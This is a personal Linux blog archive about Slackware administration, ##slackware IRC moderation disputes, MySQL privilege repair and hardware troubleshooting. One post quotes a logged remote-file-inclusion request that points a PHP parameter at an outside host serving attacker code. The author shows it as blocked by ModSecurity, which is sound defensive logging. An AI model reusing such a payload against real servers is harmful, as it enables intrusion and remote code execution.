Yeah, I had to do some archiving of the logs, as diskspace usage was at 96%. I didn't just archive the channel logs, but also archived my snort and web logs. About the only thing I haven't archived yet are the modsecurity logs (will do that sometime this weekend). Currently, the host's drive space is currently at 74%. The channel logs are still in place, but I've crunched the logs into monthly tar.bz2 files. This renders the logs unsearchable by google (yeah, this sucks), but I had to compromise...they are still downloadable, just not searchable. So, if you need them, they are there for download. Once you download them, you can grep each tar.bz2 after uncompressing them. Hopefully, Google still has the logs cached so that a person searching for an item can still see the cached files. Maybe I'll purchase more drive space so that I can host the logs in an untarred and uncompressed format in the near future.
Speaking of the channel, there has again been some ruckus about someone being banned 'unduly'. People have to recognize that moderating a channel does come at a price. One of these prices is the fact that people can't visit their frustrations on the channel. An individual visited the channel highly upset that Pat froze Slackware-current relating to issues with both the 2.4 and 2.6 kernel. Instead of following advice to follow up with Pat, he continues to vent on the channel, causing a rather heated flame war over something trivial. He was +q'd (meaning his speech was removed), but he evaded +q. He was then "removed" (meaning he was booted, not kicked, from the channel), but came back in the channel with the same attitude. He was then banned for 30 days. Anyone who evades moderation will automatically get a ban. Why 30 and not 7 days? Because, behind the scenes, in private message, the individual was very argumentive and I didn't feel like dealing with him 2 days later for the same offense. After reading the logs, someone had the gall to mention in the channel that the ban was unwarranted...this person thought that the individual was banned because of his views...WRONG. Read the channel guidelines. It states specifically that any +q/ban evasion will be dealt with in a rather harsh manner. Many people do not realize that the ops will never be able to please every single person's views in the channel. I've been doing this a LONG time (4+ years) and no matter if I just sit there and let the channel run itself or if I step in and boot someone, someone ALWAYS complains. It's a no-brainer for me: moderation is what it is. You can take it or leave it. There aren't too many channels on Freenode that aren't moderated. By nature, moderation pretty much means you can't state everything you feel, especially when it ruins the continuity of the channel chat. Is this an oxymoron, especially since Freenode is inhabited mostly by coders and free-thinkers? Every discussion, whether its in real-life in a conference or in someone's home or online on a forum or in a chat room/channel, will have some type of moderation. So, going forward, I'll not be including comments to the ban messages, as this adds confusion to why the person was banned. Really, the channel doesn't need to know why said person was banned after the fact. The ban messages are for the person being banned and it was designed that way by the people who set up the IRC specifications. If you want to know why someone was banned, speak with them directly or read the logs. I've no time to hold some lengthly dialog with someone who thinks that everyone should join an IRC channel and unload their frustrations. I try to think as objectively as possible on anything that goes on in the channel and to be quite honest, there's been a ton of bitching about the ops lately. When I see the non-ops quit pushing the ops' buttons, I'll take them more seriously and get more active in seeing to their needs...but the bellyaching has to stop first. Seriously, its usually the same people bitching about their rights being violated, and if its not the same people, there's usually some association.
Saturday, February 17, 2007
Tuesday, January 16, 2007
I saw someone hammering my web server
I saw someone hammering my web server today and yesterday. He/she generated 196 Snort alerts, which is quite a bit for my server. The cool thing is, there was negative response to the attack for two reasons:
1. The server doesn't use PHP or CGI and the attack was designed to exploit those two software packages.
2. I use ModSecurity, which is a web server application firewall.
See payload below (ModSecurity):
ModSecurity also has a web-based console that I haven't figured out how to use yet, so I usually parse the flat logs manually then correlate any malicious traffic with my firewall and Snort logs to get a better picture of questionable activity. Once I figure out how to get the web-based console up and running, I'll let you know and maybe throw together a how-to for how to utilize ModSecurity on Slackware.
1. The server doesn't use PHP or CGI and the attack was designed to exploit those two software packages.
2. I use ModSecurity, which is a web server application firewall.
See payload below (ModSecurity):
Request: midas.slackware.lan 198.145.244.232 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1" 403 304 "-" "Morfeus Fucking Scanner" RawyokKgjR4AAFL7qwU "-"The activity triggered a rule I created (yeah, ModSecurity is rule-based). I know I don't use PHP but I'd still like to see such attacks on my network, as a heads-up to escalated attacks. What I don't have is a reactive firewall, one that blocks traffic such as this automatically. I had to add the IP to my block list by hand, which sucks.
----------------------------------------
GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 66.160.141.30
User-Agent: Morfeus Fucking Scanner
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev
"2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403
HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
ModSecurity also has a web-based console that I haven't figured out how to use yet, so I usually parse the flat logs manually then correlate any malicious traffic with my firewall and Snort logs to get a better picture of questionable activity. Once I figure out how to get the web-based console up and running, I'll let you know and maybe throw together a how-to for how to utilize ModSecurity on Slackware.
Thursday, December 28, 2006
MySQL database corruption: fix
When I upgraded my main tower to Slack v11.0, I had also upgraded MySQL to v5.0.24a (I don't know what version I was using before this). Soon after the upgrade, I noticed that I couldn't access my local PHPBB and PHPMyAdmin installs.
I was receiving the following error using the MySQL client:
bash-3.1$ mysql -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
The MySQL error logs looked like this:
061227 03:08:12 mysqld started
061227 3:08:12 [Warning] No argument was provided to --log-bin, and --log-bin-index was not used; so replication may break when this MySQL server acts as a master and has his hostname changed!! Please use '--log-bin=slackbox-bin' to avoid this problem.
061227 3:08:12 InnoDB: Started; log sequence number 0 4066534
061227 3:08:12 [Warning] Found invalid password for user: 'root @% '; Ignoring user
061227 3:08:12 [Note] /usr/libexec/mysqld: ready for connections.
Version: '5.0.24a-log' socket: '/tmp/mysql.sock' port: 0 Source distribution
061227 13:13:11 [Note] /usr/libexec/mysqld: Normal shutdown
Even after restarting the MySQL service, skipping grant tables, and reseting the password, the above still showed. So, I ran the following (after restarting the MySQL service using the init script):
bash-3.1$ mysql_fix_privilege_tables --verbose
This script updates all the mysql privilege tables to be usable by
MySQL 4.0 and above.
This is needed if you want to use the new GRANT functions,
CREATE AGGREGATE FUNCTION, stored procedures, or
more secure passwords in 4.1
You can safely ignore all 'Duplicate column' and 'Unknown column' errors
because these just mean that your tables are already up to date.
This script is safe to run even if your tables are already up to date!
ERROR 1060 (42S21) at line 22: Duplicate column name 'File_priv'
ERROR 1060 (42S21) at line 28: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 29: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 30: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 41: Duplicate column name 'ssl_type'
ERROR 1146 (42S02) at line 67: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 68: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 70: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 72: Table 'mysql.procs_priv' doesn't exist
ERROR 1054 (42S22) at line 94: Unknown column 'Type' in 'columns_priv'
ERROR 1060 (42S21) at line 100: Duplicate column name 'type'
ERROR 1060 (42S21) at line 110: Duplicate column name 'Show_db_priv'
ERROR 1060 (42S21) at line 127: Duplicate column name 'max_questions'
ERROR 1060 (42S21) at line 137: Duplicate column name 'Create_tmp_table_priv'
ERROR 1060 (42S21) at line 140: Duplicate column name 'Create_tmp_table_priv'
ERROR 1061 (42000) at line 145: Duplicate key name 'Grantor'
ERROR 1054 (42S22) at line 247: Unknown column 'Create_view_priv' in 'where clause'
ERROR 1054 (42S22) at line 277: Unknown column 'Create_routine_priv' in 'where clause'
ERROR 1054 (42S22) at line 313: Unknown column 'Create_user_priv' in 'where clause'
done
bash-3.1$
After that, I was able to access the databases using the root MySQL account:
bash-3.1$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
bash-3.1$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 5.0.24a-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> quit
Bye
bash-3.1$
The issue? Apparently, there were three duplicates of the "Grant_priv" column, which I don't think was the REAL issue. Per the script notes, duplicates don't appear to break anything, but looking at where the script notes state, "This script updates all the mysql privilege tables to be usable by MySQL 4.0 and above," I wonder if that's all I needed to do (because I upgraded to a higher version).
I sometimes become so reliant upon PHPMyAdmin that I don't always know how to fix underlying issues. It looks like I'll be delving into MySQL commandline more often, just to understand MySQL at a base level before utilizing front-end tools, or at least reference PHPMyAdmin's SQL query statements a bit more (which is a very cool feature, as the front-end puts what its doing into commandline structure).
I'm betting some of you are wondering why I'm using PHPBB on my LAN. I use it as a note-taking tool. Whatever machine I'm on in my LAN, I can reference important notes or create notes that are in a central location. Even if I'm at work or at a coffee shop, I can tunnel into my LAN and view all my notes. The only thing I have to remember is to back up my databases religiously so I don't lose very important data that will hinder my work at home (and somewhat at my workplace). Yeah, I know that there may be better ways to take notes, but my notes sometimes tend to be lengthy and when I'm troubleshooting, it's easy to create a thread of trial-and-error posts so I can keep track of what I need to do, what I've already done, or what I shouldn't do. There aren't too many tools that can organize and store data like a CMS can. :)
Happy Holidays!!
I was receiving the following error using the MySQL client:
bash-3.1$ mysql -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
The MySQL error logs looked like this:
061227 03:08:12 mysqld started
061227 3:08:12 [Warning] No argument was provided to --log-bin, and --log-bin-index was not used; so replication may break when this MySQL server acts as a master and has his hostname changed!! Please use '--log-bin=slackbox-bin' to avoid this problem.
061227 3:08:12 InnoDB: Started; log sequence number 0 4066534
061227 3:08:12 [Warning] Found invalid password for user: 'root @% '; Ignoring user
061227 3:08:12 [Note] /usr/libexec/mysqld: ready for connections.
Version: '5.0.24a-log' socket: '/tmp/mysql.sock' port: 0 Source distribution
061227 13:13:11 [Note] /usr/libexec/mysqld: Normal shutdown
Even after restarting the MySQL service, skipping grant tables, and reseting the password, the above still showed. So, I ran the following (after restarting the MySQL service using the init script):
bash-3.1$ mysql_fix_privilege_tables --verbose
This script updates all the mysql privilege tables to be usable by
MySQL 4.0 and above.
This is needed if you want to use the new GRANT functions,
CREATE AGGREGATE FUNCTION, stored procedures, or
more secure passwords in 4.1
You can safely ignore all 'Duplicate column' and 'Unknown column' errors
because these just mean that your tables are already up to date.
This script is safe to run even if your tables are already up to date!
ERROR 1060 (42S21) at line 22: Duplicate column name 'File_priv'
ERROR 1060 (42S21) at line 28: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 29: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 30: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 41: Duplicate column name 'ssl_type'
ERROR 1146 (42S02) at line 67: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 68: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 70: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 72: Table 'mysql.procs_priv' doesn't exist
ERROR 1054 (42S22) at line 94: Unknown column 'Type' in 'columns_priv'
ERROR 1060 (42S21) at line 100: Duplicate column name 'type'
ERROR 1060 (42S21) at line 110: Duplicate column name 'Show_db_priv'
ERROR 1060 (42S21) at line 127: Duplicate column name 'max_questions'
ERROR 1060 (42S21) at line 137: Duplicate column name 'Create_tmp_table_priv'
ERROR 1060 (42S21) at line 140: Duplicate column name 'Create_tmp_table_priv'
ERROR 1061 (42000) at line 145: Duplicate key name 'Grantor'
ERROR 1054 (42S22) at line 247: Unknown column 'Create_view_priv' in 'where clause'
ERROR 1054 (42S22) at line 277: Unknown column 'Create_routine_priv' in 'where clause'
ERROR 1054 (42S22) at line 313: Unknown column 'Create_user_priv' in 'where clause'
done
bash-3.1$
After that, I was able to access the databases using the root MySQL account:
bash-3.1$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
bash-3.1$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 5.0.24a-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> quit
Bye
bash-3.1$
The issue? Apparently, there were three duplicates of the "Grant_priv" column, which I don't think was the REAL issue. Per the script notes, duplicates don't appear to break anything, but looking at where the script notes state, "This script updates all the mysql privilege tables to be usable by MySQL 4.0 and above," I wonder if that's all I needed to do (because I upgraded to a higher version).
I sometimes become so reliant upon PHPMyAdmin that I don't always know how to fix underlying issues. It looks like I'll be delving into MySQL commandline more often, just to understand MySQL at a base level before utilizing front-end tools, or at least reference PHPMyAdmin's SQL query statements a bit more (which is a very cool feature, as the front-end puts what its doing into commandline structure).
I'm betting some of you are wondering why I'm using PHPBB on my LAN. I use it as a note-taking tool. Whatever machine I'm on in my LAN, I can reference important notes or create notes that are in a central location. Even if I'm at work or at a coffee shop, I can tunnel into my LAN and view all my notes. The only thing I have to remember is to back up my databases religiously so I don't lose very important data that will hinder my work at home (and somewhat at my workplace). Yeah, I know that there may be better ways to take notes, but my notes sometimes tend to be lengthy and when I'm troubleshooting, it's easy to create a thread of trial-and-error posts so I can keep track of what I need to do, what I've already done, or what I shouldn't do. There aren't too many tools that can organize and store data like a CMS can. :)
Happy Holidays!!
Tuesday, October 24, 2006
Using a PCMCIA Wifi Card On Your Laptop - Closed-source Chipsets
I've got my WPC54GS Linksys wifi card, which uses a closed-source chipset (Broadcom), working with Slackware 10.2 installed on a Dell Inspiron 8500. I've posted the process to get this working before at slackwiki.org.
I've scripted this process. You can grab the script from here. Edit it as you see fit. Many people actually use the tools that come with Slackware (the wireless configs in /etc/rc.d, I believe). I script my own, as I've many different wifi cards that I often swap out for different needs.
Anyways, give it a shot.
My next task is getting WPA working with the card (wpa_supplicant, I believe).
I've scripted this process. You can grab the script from here. Edit it as you see fit. Many people actually use the tools that come with Slackware (the wireless configs in /etc/rc.d, I believe). I script my own, as I've many different wifi cards that I often swap out for different needs.
Anyways, give it a shot.
My next task is getting WPA working with the card (wpa_supplicant, I believe).
Ever Wonder How to Use A Mouse & Touchpad in X?
I remember, awhile back, I got a USB mouse and touchpad working in X on my first laptop (using Suse). Many people still ask this question in ##slackware.
All you do is ensure you have the following within your xorg.conf file:
Section "ServerLayout"
Identifier "X.org Configured"
Screen 0 "Screen0" 0 0
InputDevice "Mouse0" "CorePointer"
InputDevice "Mouse1" "SendCoreEvents"
InputDevice "Keyboard0" "CoreKeyboard"
.
.
.
Section "InputDevice"
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/mouse"
EndSection
Section "InputDevice"
Driver "mouse"
Identifier "Mouse1"
Option "Device" "/dev/input/mice"
Option "Name" "Autodetection"
Option "Protocol" "imps/2"
Option "Vendor" "Logitech"
EndSection
You'll notice that the bold print is the print that you have to add to your pre-existing configuration.
The whole file is here.
Give it a whirl...and good luck!
All you do is ensure you have the following within your xorg.conf file:
Section "ServerLayout"
Identifier "X.org Configured"
Screen 0 "Screen0" 0 0
InputDevice "Mouse0" "CorePointer"
InputDevice "Mouse1" "SendCoreEvents"
InputDevice "Keyboard0" "CoreKeyboard"
.
.
.
Section "InputDevice"
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/mouse"
EndSection
Section "InputDevice"
Driver "mouse"
Identifier "Mouse1"
Option "Device" "/dev/input/mice"
Option "Name" "Autodetection"
Option "Protocol" "imps/2"
Option "Vendor" "Logitech"
EndSection
You'll notice that the bold print is the print that you have to add to your pre-existing configuration.
The whole file is here.
Give it a whirl...and good luck!
Sunday, October 22, 2006
Recently Acquired a Dell Precision 220, Installed ZenWalk 3.0 on it
Yes, I got a Dell Precision 220 from work that they were going to throw in the trash (along with a Dell 17" CRT monitor). It lacked RAM and a hard disk. I scrounged up some RAM and this was a difficult task, as the system requires RAMBUS. I found 128MB between two chips of RAMBUS, which isn't a lot but it gets the system working. The system also supports SMP but only has one processor at the moment, a PIII Coppermine 650MHz CPU. It is peppy enough with ZenWalk.
Why ZenWalk? Because I've Slackware running on three systems already and wanted to try ZenWalk, which is a derivative of Slackware. It does well.
The system currently has three NICs, which is why I will eventually place it on firewall duty.
I'm trying to score two 1GHz CPUs (the max this system will take), although they'll have to be PIII Coppermines and also be matched. I found one such matching set locally on Craigslist, but have yet to coordinate a meet/buy. I may even put them into my Dell Precision 410 instead, and swap out the 410's 450MHz CPUs to the Precision 220.
I'll keep you informed on how ZenWalk is, as the days go by.
Why ZenWalk? Because I've Slackware running on three systems already and wanted to try ZenWalk, which is a derivative of Slackware. It does well.
The system currently has three NICs, which is why I will eventually place it on firewall duty.
I'm trying to score two 1GHz CPUs (the max this system will take), although they'll have to be PIII Coppermines and also be matched. I found one such matching set locally on Craigslist, but have yet to coordinate a meet/buy. I may even put them into my Dell Precision 410 instead, and swap out the 410's 450MHz CPUs to the Precision 220.
I'll keep you informed on how ZenWalk is, as the days go by.
Friday, October 20, 2006
Xine and adding .wmv support; ModSecurity using Slackware 9.0 and Apache 1.3.37
I don't know why I hadn't done this before, but last night, I finally added .wmv support to Xine, following the directions at http://xinehq.de/index.php/faq#WMV. I had it functional using .wmv support within 5 minutes.
Please don't email me about how you got it working with mplayer. I don't do mplayer and any mplayer comments won't add value to my Xine experience. :)
I've also given ModSecurity a spin (see http://www.modsecurity.org/). It's VERY nice. I'm using it on my public Apache server (version 1.3.37), which runs Slackware 9.0...yes, I need to update, but its as production as I can get it and it is hardened, so I'm not so worried about it being quite a bit behind the versioning scheme. As long as it works.
What is ModSecurity? From the website, "ModSecurity is an embeddable web application firewall. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure." You can also get a core ruleset from the same site (). I've been trying to create my own rules with nil results, so I think I'll give the core rules a shot.
Try ModSecurity. I'm sure you'll like the logging, at the very least.
Please don't email me about how you got it working with mplayer. I don't do mplayer and any mplayer comments won't add value to my Xine experience. :)
I've also given ModSecurity a spin (see http://www.modsecurity.org/). It's VERY nice. I'm using it on my public Apache server (version 1.3.37), which runs Slackware 9.0...yes, I need to update, but its as production as I can get it and it is hardened, so I'm not so worried about it being quite a bit behind the versioning scheme. As long as it works.
What is ModSecurity? From the website, "ModSecurity is an embeddable web application firewall. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure." You can also get a core ruleset from the same site (). I've been trying to create my own rules with nil results, so I think I'll give the core rules a shot.
Try ModSecurity. I'm sure you'll like the logging, at the very least.
Tuesday, October 03, 2006
Slackware v11 out!!
From the Slackware-current changelog:
Sun Oct 1 23:50:53 CDT 2006
Slackware 11.0 is released. Thanks to everyone who helped out and made this
release possible. If I forgot you in the ChangeLog, mea culpa, but you know
who you are, and thanks. :-)
Enjoy! -P.
Sun Oct 1 23:50:53 CDT 2006
Slackware 11.0 is released. Thanks to everyone who helped out and made this
release possible. If I forgot you in the ChangeLog, mea culpa, but you know
who you are, and thanks. :-)
Enjoy! -P.
Sunday, October 01, 2006
Slack Machine Woes Fixed!
My Slack tower is fixed.
The root cause was that, somehow, when I created a new partition from some free space on the drive, the Slack install didn't like it one bit and complained the whole time. I'm not going to blame Gparted, though...
On this system, I use / to house the whole Slackware install, using /home as a directory instead of having it as its own partition. /home was 9+ GB and growing, so that / was at 92% in utilization. I decided to move it to its own partition. Using Gparted, I created a partition (/dev/hdb5). There were currently two primary partitions already on the drive (/ and swap), so I decided to create a logical partition to house /home. Somehow, Gparted fux0red the extended partition, I think.
Soon after I created the partition, I began to see boot errors hinting that there was a corruption problem with this drive, although if I sat through the boot errors, they'd finally stop and I'd get a login prompt.
I misdiagnosed the issue and thought that this 7-year-old drive had finally gave up the ghost. I almost trashed the drive but decided to give it another shot by removing the extended partition and making a new partition, a primary one. In fact, I made two and move /home to one of them (/dev/hdb2, I believe). Afterward, I adjusted my /etc/fstab to see /home and rebooted. There were no more errors on boot.
Next, I need to start doing nightly/weekly backups (somehow), then maybe clear out my /home and get rid of some junk (maybe backup to DVD).
The root cause was that, somehow, when I created a new partition from some free space on the drive, the Slack install didn't like it one bit and complained the whole time. I'm not going to blame Gparted, though...
On this system, I use / to house the whole Slackware install, using /home as a directory instead of having it as its own partition. /home was 9+ GB and growing, so that / was at 92% in utilization. I decided to move it to its own partition. Using Gparted, I created a partition (/dev/hdb5). There were currently two primary partitions already on the drive (/ and swap), so I decided to create a logical partition to house /home. Somehow, Gparted fux0red the extended partition, I think.
Soon after I created the partition, I began to see boot errors hinting that there was a corruption problem with this drive, although if I sat through the boot errors, they'd finally stop and I'd get a login prompt.
I misdiagnosed the issue and thought that this 7-year-old drive had finally gave up the ghost. I almost trashed the drive but decided to give it another shot by removing the extended partition and making a new partition, a primary one. In fact, I made two and move /home to one of them (/dev/hdb2, I believe). Afterward, I adjusted my /etc/fstab to see /home and rebooted. There were no more errors on boot.
Next, I need to start doing nightly/weekly backups (somehow), then maybe clear out my /home and get rid of some junk (maybe backup to DVD).
Tuesday, September 26, 2006
Slackware-current is at RC5, as of 21 September
Yes, this is the longest string of RC status ever. Pat promises that this will be the last version before release. There's still a good bit of changelog activity, though.
Also, I've lost my Slackware tower. Well, its still here, but one of the drives went corrupt. I saw a ton of corruption in my Slack install's dmesg that didn't clear after doing an fsck. If anything it got a LOT worse. Luckily, I'd just done a backup of my /home dir to another drive, LIKE 5 MIN BEFORE THE DRIVE STARTED THROWING ERRORS! Talk about lucky. Now, I have an issue. This tower doesn't have a floppy drive (although I can hook one up). I need a floppy so I can boot up using a WinXP or MSDOS floppy that contains the format command...you see, I have to clear lilo from the boot drive's MBR before I can be able to use the system again, as the system currently tries to boot me into the bad drive (which I've removed...I'll double-check later whether its salvagable or not).
I guess this means I'm in the market for a new hard disk. This is the perfect opportunity for me to get another SATA drive, preferrably higher capacity than my 160GB drive. The drive that went corrupt was a Maxtor 60GB drive that I bought around 1999-2000...talk about long lived. What brand will I get next? Most likely a Seagate or Maxtor. I may get another 160GB Seagate so that I can give RAID a go (I've an onboard SATA RAID controller).
For now, I've no working Slackware machine...OK, shoot me cuz I just lied. I've my Dell Inspiron 8500 and my Toshiba Satellite 1GHz. Both need to be rsync'd, which means I have to use CAT5 to do the sync...last time I did an rsync over wifi, it wasn't pretty.
Anyways, I've my work cut out for me for the next two weeks. AND, I've to study so I can take the CCSA and CCSE exams.
Also, I've lost my Slackware tower. Well, its still here, but one of the drives went corrupt. I saw a ton of corruption in my Slack install's dmesg that didn't clear after doing an fsck. If anything it got a LOT worse. Luckily, I'd just done a backup of my /home dir to another drive, LIKE 5 MIN BEFORE THE DRIVE STARTED THROWING ERRORS! Talk about lucky. Now, I have an issue. This tower doesn't have a floppy drive (although I can hook one up). I need a floppy so I can boot up using a WinXP or MSDOS floppy that contains the format command...you see, I have to clear lilo from the boot drive's MBR before I can be able to use the system again, as the system currently tries to boot me into the bad drive (which I've removed...I'll double-check later whether its salvagable or not).
I guess this means I'm in the market for a new hard disk. This is the perfect opportunity for me to get another SATA drive, preferrably higher capacity than my 160GB drive. The drive that went corrupt was a Maxtor 60GB drive that I bought around 1999-2000...talk about long lived. What brand will I get next? Most likely a Seagate or Maxtor. I may get another 160GB Seagate so that I can give RAID a go (I've an onboard SATA RAID controller).
For now, I've no working Slackware machine...OK, shoot me cuz I just lied. I've my Dell Inspiron 8500 and my Toshiba Satellite 1GHz. Both need to be rsync'd, which means I have to use CAT5 to do the sync...last time I did an rsync over wifi, it wasn't pretty.
Anyways, I've my work cut out for me for the next two weeks. AND, I've to study so I can take the CCSA and CCSE exams.
Thursday, September 07, 2006
Slackware now at RC4 status, as of 3 Sep 2006
Yes, Slack is at RC4 now, and has been a bit dormant since the 3rd of September, with quite a few updates. The quietness may be a good indication that things are almost ready to go stable. We shall see.
I've yet to update to RC4, but maybe I'll get the chance this weekend.
I've yet to update to RC4, but maybe I'll get the chance this weekend.
Wednesday, August 30, 2006
Slackbox is now at RC3
I updated my machine to Slackware v11.0 RC3 last night. It didn't take long and I also moved my local mirror. I haven't noticed much of any difference in RC1 or RC2, function-wise. Nothing appears broken, although since I'm using 2.6.17.8, I've noticed a lot of 'atkbd' errors in my /var/log/messages file, which I attribute to my KVM not agreeing with that kernel. We shall see...
Sunday, August 27, 2006
Slackware Wikipedia Entry, ##slackware road rage that has to stop
Here it is: http://en.wikipedia.org/wiki/Slackware
The above link is for people who constantly enter ##slackware asking what Slackware is about or how it compares to other distributions.
The questions are highly irritating, as the information is ALL over the internet and people tend to not use http://www.google.com as it was intended. There are comparisons between Slackware and other distributions everywhere. Information on Slackware and its philosophy is also everywhere, so it is a bit ridiculous going to ##slackware and asking for comments, especially when one will most likely receive biased opinions: of course we aren't going to slight our own distribution.
##slackware on the whole has become very weird lately. We've lost a few old-timers that offered excellent support. We've also decided to kill the more off-topic banter unless there is absolutely nothing else to chat about...then we tend to get visitors who think we serve them like it is a paying job and we're customer support. We also have regulars who try to dictate to the channel operators the way the channel should be run...they pretty much threaten to hijack the userbase by opening other channels if they don't get their way or say in the matter.
I should explain how things should work:
1. I'm the head operator of ##slackware on irc.slackware.com. I maintain the channel's chat flow. I don't lord it over the channel. Proof that I do not abuse operator power is documented in your own IRC client logs (if you've visited ##slackware) or at http://wigglit.ath.cx/slackware_botlogs/.
2. The guidelines are enforced by the operators based on the guidelines posted at http://wigglit.ath.cx/slackware-rules/rules.shtml. Those rules SUPERCEDE the server guidelines (http://freenode.net/channel_guidelines.shtml). What's good for the server isn't necessarily good for our channel. Don't complain to the server ops about this because they will not become involved, as is their policy...they don't govern the channels, that's what the channel ops are for.
3. The channel guidelines are just that: guidelines. They are there to give the visitors an inkling of what's accepted and what's not. These are not constitutional laws, so when you find yourself banned because you think we won't take away your speech and we do, realize that IRC doesn't give you the right to tell someone to fuck off or post porn links or 'fight the man', with 'the man' being the channel operators.
4. Visitors should NOT expect us to answer every question that is asked. Some of us have day jobs. Some have families. Some may not have the experience or knowledge to answer the question. Some don't care. Don't expect the conversation to gravitate toward you when you ask a question. Current discussions may not stop when you ask your question, so don't get ticked off...keep asking (within limits; don't spam the channel with the same question every 60 seconds or you will get removed), maybe every 3 or so minutes. Also, BE SURE YOUR QUESTION PERTAINS TO SLACKWARE, AND NOT SOFTWARE THAT MAY BE INCLUDED IN SLACKWARE'S BASE INSTALL!! This means that if you've an issue with KDE or a KDE application that's installed on your Slackware distribution, your issue isn't slackware-related, its KDE-related, unless you can PROVE that the underlying issue is indeed related to Slackware. This also applies to hardware.
5. If anything happens in the channel that upsets you, take a deep breath and use your IRC client's ignore function to filter out the unwanted chatter. Don't take the matter into your own hands by insulting the offender, as you may become kicked or banned from the channel, regardless of your intentions. We recently had an incident where someone decided to attack someone based on the perception that the victim was overweight. The offender was asked to stop with a 'first and last warning' but continued 10 minutes later and was banned. Also, at this point, the victim had previously been passive to the attack, but became aggressive when the attacker ignored the operator's warning. After the attacker was banned, an onlooker decided to join the fray by insisting that the victim should also be banned because the victim defended himself by attacking also. The fact remains that the first attacker was banned because he directly ignored an operator's warning. The onlooker was also banned because he couldn't this issue, which was none of his business, die. Is all of this considered favoritism? In the above context, no, but if you're someone who is used to inciting anarchy, the rules/guidelines of ##slackware will never be enough. This is why every operator is empowered to handle things as they see fit, even when an abuser's tactics skirt the guidelines.
6. Lastly, if you bait an operator just for the sake of skirting guidelines, you're going to lose that battle. An intellectual debate is one thing, a targeted yet subtle attack is beyond the norm and will be dealt with.
I'll probably be posting the link to this entry to ##slackware so people can be aware of how assinine the drama in ##slackware has been lately.
A good example of some of the above activity can be found at this link:
http://wigglit.ath.cx/slackware_botlogs/slackware.log.27Aug2006
Use your browser's find function to find 'corto' and read from there until he gets his voice taken (around 4:22PM).
The above link is for people who constantly enter ##slackware asking what Slackware is about or how it compares to other distributions.
The questions are highly irritating, as the information is ALL over the internet and people tend to not use http://www.google.com as it was intended. There are comparisons between Slackware and other distributions everywhere. Information on Slackware and its philosophy is also everywhere, so it is a bit ridiculous going to ##slackware and asking for comments, especially when one will most likely receive biased opinions: of course we aren't going to slight our own distribution.
##slackware on the whole has become very weird lately. We've lost a few old-timers that offered excellent support. We've also decided to kill the more off-topic banter unless there is absolutely nothing else to chat about...then we tend to get visitors who think we serve them like it is a paying job and we're customer support. We also have regulars who try to dictate to the channel operators the way the channel should be run...they pretty much threaten to hijack the userbase by opening other channels if they don't get their way or say in the matter.
I should explain how things should work:
1. I'm the head operator of ##slackware on irc.slackware.com. I maintain the channel's chat flow. I don't lord it over the channel. Proof that I do not abuse operator power is documented in your own IRC client logs (if you've visited ##slackware) or at http://wigglit.ath.cx/slackware_botlogs/.
2. The guidelines are enforced by the operators based on the guidelines posted at http://wigglit.ath.cx/slackware-rules/rules.shtml. Those rules SUPERCEDE the server guidelines (http://freenode.net/channel_guidelines.shtml). What's good for the server isn't necessarily good for our channel. Don't complain to the server ops about this because they will not become involved, as is their policy...they don't govern the channels, that's what the channel ops are for.
3. The channel guidelines are just that: guidelines. They are there to give the visitors an inkling of what's accepted and what's not. These are not constitutional laws, so when you find yourself banned because you think we won't take away your speech and we do, realize that IRC doesn't give you the right to tell someone to fuck off or post porn links or 'fight the man', with 'the man' being the channel operators.
4. Visitors should NOT expect us to answer every question that is asked. Some of us have day jobs. Some have families. Some may not have the experience or knowledge to answer the question. Some don't care. Don't expect the conversation to gravitate toward you when you ask a question. Current discussions may not stop when you ask your question, so don't get ticked off...keep asking (within limits; don't spam the channel with the same question every 60 seconds or you will get removed), maybe every 3 or so minutes. Also, BE SURE YOUR QUESTION PERTAINS TO SLACKWARE, AND NOT SOFTWARE THAT MAY BE INCLUDED IN SLACKWARE'S BASE INSTALL!! This means that if you've an issue with KDE or a KDE application that's installed on your Slackware distribution, your issue isn't slackware-related, its KDE-related, unless you can PROVE that the underlying issue is indeed related to Slackware. This also applies to hardware.
